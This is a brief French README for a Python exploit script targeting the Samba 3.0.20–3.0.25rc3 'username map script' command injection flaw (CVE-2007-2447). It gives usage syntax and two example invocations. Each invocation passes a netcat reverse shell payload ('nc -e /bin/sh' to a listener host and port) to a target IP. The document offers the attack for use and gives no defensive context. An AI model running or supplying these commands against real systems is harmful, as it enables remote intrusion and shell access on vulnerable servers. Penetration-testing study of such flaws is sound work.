
Implémentation Python de l'exploit RCE du 'Username' map script pour Samba 3.0.20 < 3.0.25rc3 (CVE-2007-2447).
Implémentation en Python de l'exploit RCE 'Username' map script' pour Samba 3.0.20 < 3.0.25rc3 (CVE-2007-2447).
python3 smbExploit.py <IP> <PORT> <PAYLOAD>
Exemples :
python3 smbExploit.py 192.168.1.2 139 'nc -e /bin/sh 192.168.1.1 4444'
python3 smbExploit.py 192.168.1.2 'nc -e /bin/sh 192.168.1.1 4444'
CVE-2007-2447 : Vulnérabilité d'injection de commande à distance
Samba 3.0.20 < 3.0.25rc3 - Exécution de commande via le 'map script' 'Username' (Metasploit)